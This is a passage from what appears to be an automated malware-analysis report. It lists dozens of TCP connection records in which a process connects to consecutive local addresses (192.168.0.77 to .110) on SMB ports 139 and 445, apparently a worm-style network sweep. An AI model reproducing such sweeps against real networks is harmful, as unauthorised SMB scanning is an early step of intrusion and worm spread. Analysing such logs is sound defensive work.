Connect	remote_address = 192.168.0.77, remote_port = 445		1	Fn

TCP Session #155

Information	Value
Handle	0x5f4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.78
Remote Port	445
Local Address	0.0.0.0
Local Port	49315
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.78, remote_port = 445		1	Fn

TCP Session #156

Information	Value
Handle	0x5f8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.78
Remote Port	139
Local Address	0.0.0.0
Local Port	49316
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.78, remote_port = 139		1	Fn

TCP Session #157

Information	Value
Handle	0x5f0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.79
Remote Port	139
Local Address	0.0.0.0
Local Port	49317
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.79, remote_port = 139		1	Fn

TCP Session #158

Information	Value
Handle	0x5fc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.79
Remote Port	445
Local Address	0.0.0.0
Local Port	49318
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.79, remote_port = 445		1	Fn

TCP Session #159

Information	Value
Handle	0x5e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.80
Remote Port	445
Local Address	0.0.0.0
Local Port	49319
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.80, remote_port = 445		1	Fn

TCP Session #160

Information	Value
Handle	0x600
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.80
Remote Port	139
Local Address	0.0.0.0
Local Port	49320
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.80, remote_port = 139		1	Fn

TCP Session #161

Information	Value
Handle	0x604
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.81
Remote Port	139
Local Address	0.0.0.0
Local Port	49321
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.81, remote_port = 139		1	Fn

TCP Session #162

Information	Value
Handle	0x60c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.81
Remote Port	445
Local Address	0.0.0.0
Local Port	49322
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.81, remote_port = 445		1	Fn

TCP Session #163

Information	Value
Handle	0x614
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.82
Remote Port	445
Local Address	0.0.0.0
Local Port	49323
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.82, remote_port = 445		1	Fn

TCP Session #164

Information	Value
Handle	0x618
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.82
Remote Port	139
Local Address	0.0.0.0
Local Port	49324
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.82, remote_port = 139		1	Fn

TCP Session #165

Information	Value
Handle	0x610
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.83
Remote Port	139
Local Address	0.0.0.0
Local Port	49325
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.83, remote_port = 139		1	Fn

TCP Session #166

Information	Value
Handle	0x5c0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.83
Remote Port	445
Local Address	0.0.0.0
Local Port	49326
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.83, remote_port = 445		1	Fn

TCP Session #167

Information	Value
Handle	0x61c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.84
Remote Port	445
Local Address	0.0.0.0
Local Port	49327
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.84, remote_port = 445		1	Fn

TCP Session #168

Information	Value
Handle	0x620
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.84
Remote Port	139
Local Address	0.0.0.0
Local Port	49328
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.84, remote_port = 139		1	Fn

TCP Session #169

Information	Value
Handle	0x628
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.85
Remote Port	139
Local Address	0.0.0.0
Local Port	49329
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.85, remote_port = 139		1	Fn

TCP Session #170

Information	Value
Handle	0x62c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.85
Remote Port	445
Local Address	0.0.0.0
Local Port	49330
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.85, remote_port = 445		1	Fn

TCP Session #171

Information	Value
Handle	0x630
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.86
Remote Port	445
Local Address	0.0.0.0
Local Port	49331
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.86, remote_port = 445		1	Fn

TCP Session #172

Information	Value
Handle	0x634
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.86
Remote Port	139
Local Address	0.0.0.0
Local Port	49332
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.86, remote_port = 139		1	Fn

TCP Session #173

Information	Value
Handle	0x638
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.87
Remote Port	139
Local Address	0.0.0.0
Local Port	49333
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.87, remote_port = 139		1	Fn

TCP Session #174

Information	Value
Handle	0x63c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.87
Remote Port	445
Local Address	0.0.0.0
Local Port	49334
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.87, remote_port = 445		1	Fn

TCP Session #175

Information	Value
Handle	0x134
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.88
Remote Port	445
Local Address	0.0.0.0
Local Port	49335
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.88, remote_port = 445		1	Fn

TCP Session #176

Information	Value
Handle	0x650
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.88
Remote Port	139
Local Address	0.0.0.0
Local Port	49336
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.88, remote_port = 139		1	Fn

TCP Session #177

Information	Value
Handle	0x658
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.89
Remote Port	139
Local Address	0.0.0.0
Local Port	49337
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.89, remote_port = 139		1	Fn

TCP Session #178

Information	Value
Handle	0x65c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.89
Remote Port	445
Local Address	0.0.0.0
Local Port	49338
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.89, remote_port = 445		1	Fn

TCP Session #179

Information	Value
Handle	0x654
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.90
Remote Port	445
Local Address	0.0.0.0
Local Port	49339
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.90, remote_port = 445		1	Fn

TCP Session #180

Information	Value
Handle	0x660
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.90
Remote Port	139
Local Address	0.0.0.0
Local Port	49340
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.90, remote_port = 139		1	Fn

TCP Session #181

Information	Value
Handle	0x668
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.91
Remote Port	139
Local Address	0.0.0.0
Local Port	49341
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.91, remote_port = 139		1	Fn

TCP Session #182

Information	Value
Handle	0x66c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.91
Remote Port	445
Local Address	0.0.0.0
Local Port	49342
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.91, remote_port = 445		1	Fn

TCP Session #183

Information	Value
Handle	0x664
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.92
Remote Port	445
Local Address	0.0.0.0
Local Port	49343
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.92, remote_port = 445		1	Fn

TCP Session #184

Information	Value
Handle	0x670
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.92
Remote Port	139
Local Address	0.0.0.0
Local Port	49344
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.92, remote_port = 139		1	Fn

TCP Session #185

Information	Value
Handle	0x644
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.93
Remote Port	139
Local Address	0.0.0.0
Local Port	49345
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.93, remote_port = 139		1	Fn

TCP Session #186

Information	Value
Handle	0x678
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.93
Remote Port	445
Local Address	0.0.0.0
Local Port	49346
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.93, remote_port = 445		1	Fn

TCP Session #187

Information	Value
Handle	0x674
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.94
Remote Port	445
Local Address	0.0.0.0
Local Port	49347
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.94, remote_port = 445		1	Fn

TCP Session #188

Information	Value
Handle	0x640
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.94
Remote Port	139
Local Address	0.0.0.0
Local Port	49348
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.94, remote_port = 139		1	Fn

TCP Session #189

Information	Value
Handle	0x67c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.95
Remote Port	139
Local Address	0.0.0.0
Local Port	49349
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.95, remote_port = 139		1	Fn

TCP Session #190

Information	Value
Handle	0x680
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.95
Remote Port	445
Local Address	0.0.0.0
Local Port	49350
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.95, remote_port = 445		1	Fn

TCP Session #191

Information	Value
Handle	0x684
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.96
Remote Port	445
Local Address	0.0.0.0
Local Port	49351
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.96, remote_port = 445		1	Fn

TCP Session #192

Information	Value
Handle	0x688
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.96
Remote Port	139
Local Address	0.0.0.0
Local Port	49352
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.96, remote_port = 139		1	Fn

TCP Session #193

Information	Value
Handle	0x68c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.97
Remote Port	445
Local Address	0.0.0.0
Local Port	49353
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.97, remote_port = 445		1	Fn

TCP Session #194

Information	Value
Handle	0x690
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.97
Remote Port	139
Local Address	0.0.0.0
Local Port	49354
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.97, remote_port = 139		1	Fn

TCP Session #195

Information	Value
Handle	0x5d4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.98
Remote Port	139
Local Address	0.0.0.0
Local Port	49355
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.98, remote_port = 139		1	Fn

TCP Session #196

Information	Value
Handle	0x624
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.98
Remote Port	445
Local Address	0.0.0.0
Local Port	49356
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.98, remote_port = 445		1	Fn

TCP Session #197

Information	Value
Handle	0x698
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.99
Remote Port	445
Local Address	0.0.0.0
Local Port	49357
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.99, remote_port = 445		1	Fn

TCP Session #198

Information	Value
Handle	0x69c
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.99
Remote Port	139
Local Address	0.0.0.0
Local Port	49358
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.99, remote_port = 139		1	Fn

TCP Session #199

Information	Value
Handle	0x6a8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.100
Remote Port	139
Local Address	0.0.0.0
Local Port	49359
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.100, remote_port = 139		1	Fn

TCP Session #200

Information	Value
Handle	0x6ac
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.100
Remote Port	445
Local Address	0.0.0.0
Local Port	49360
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.100, remote_port = 445		1	Fn

TCP Session #201

Information	Value
Handle	0x6b0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.101
Remote Port	445
Local Address	0.0.0.0
Local Port	49361
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.101, remote_port = 445		1	Fn

TCP Session #202

Information	Value
Handle	0x6b4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.101
Remote Port	139
Local Address	0.0.0.0
Local Port	49362
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.101, remote_port = 139		1	Fn

TCP Session #203

Information	Value
Handle	0x6b8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.102
Remote Port	139
Local Address	0.0.0.0
Local Port	49363
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.102, remote_port = 139		1	Fn

TCP Session #204

Information	Value
Handle	0x6bc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.102
Remote Port	445
Local Address	0.0.0.0
Local Port	49364
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.102, remote_port = 445		1	Fn

TCP Session #205

Information	Value
Handle	0x6a4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.103
Remote Port	445
Local Address	0.0.0.0
Local Port	49365
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.103, remote_port = 445		1	Fn

TCP Session #206

Information	Value
Handle	0x6c0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.103
Remote Port	139
Local Address	0.0.0.0
Local Port	49366
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.103, remote_port = 139		1	Fn

TCP Session #207

Information	Value
Handle	0x588
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.104
Remote Port	139
Local Address	0.0.0.0
Local Port	49367
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.104, remote_port = 139		1	Fn

TCP Session #208

Information	Value
Handle	0x6a0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.104
Remote Port	445
Local Address	0.0.0.0
Local Port	49368
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.104, remote_port = 445		1	Fn

TCP Session #209

Information	Value
Handle	0x6c8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.105
Remote Port	445
Local Address	0.0.0.0
Local Port	49369
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.105, remote_port = 445		1	Fn

TCP Session #210

Information	Value
Handle	0x6cc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.105
Remote Port	139
Local Address	0.0.0.0
Local Port	49370
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.105, remote_port = 139		1	Fn

TCP Session #211

Information	Value
Handle	0x6d8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.106
Remote Port	139
Local Address	0.0.0.0
Local Port	49371
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.106, remote_port = 139		1	Fn

TCP Session #212

Information	Value
Handle	0x6dc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.106
Remote Port	445
Local Address	0.0.0.0
Local Port	49372
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.106, remote_port = 445		1	Fn

TCP Session #213

Information	Value
Handle	0x6e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.107
Remote Port	445
Local Address	0.0.0.0
Local Port	49373
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.107, remote_port = 445		1	Fn

TCP Session #214

Information	Value
Handle	0x6e4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.107
Remote Port	139
Local Address	0.0.0.0
Local Port	49374
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.107, remote_port = 139		1	Fn

TCP Session #215

Information	Value
Handle	0x6e8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.108
Remote Port	139
Local Address	0.0.0.0
Local Port	49375
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.108, remote_port = 139		1	Fn

TCP Session #216

Information	Value
Handle	0x6ec
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.108
Remote Port	445
Local Address	0.0.0.0
Local Port	49376
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.108, remote_port = 445		1	Fn

TCP Session #217

Information	Value
Handle	0x6f0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.109
Remote Port	445
Local Address	0.0.0.0
Local Port	49377
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.109, remote_port = 445		1	Fn

TCP Session #218

Information	Value
Handle	0x6f4
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.109
Remote Port	139
Local Address	0.0.0.0
Local Port	49378
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.109, remote_port = 139		1	Fn

TCP Session #219

Information	Value
Handle	0x6f8
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.110
Remote Port	139
Local Address	0.0.0.0
Local Port	49379
Data Sent	0 bytes
Data Received	0 bytes

Operation	Additional Information	Success	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM		1	Fn
Connect	remote_address = 192.168.0.110, remote_port = 139		1	Fn

TCP Session #220

Information	Value
Handle	0x6fc
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	192.168.0.110
Remote Port	445
Local Address	0.0.0.0
Local Port	49380
Data Sent	0 bytes
Data Received	0 bytes

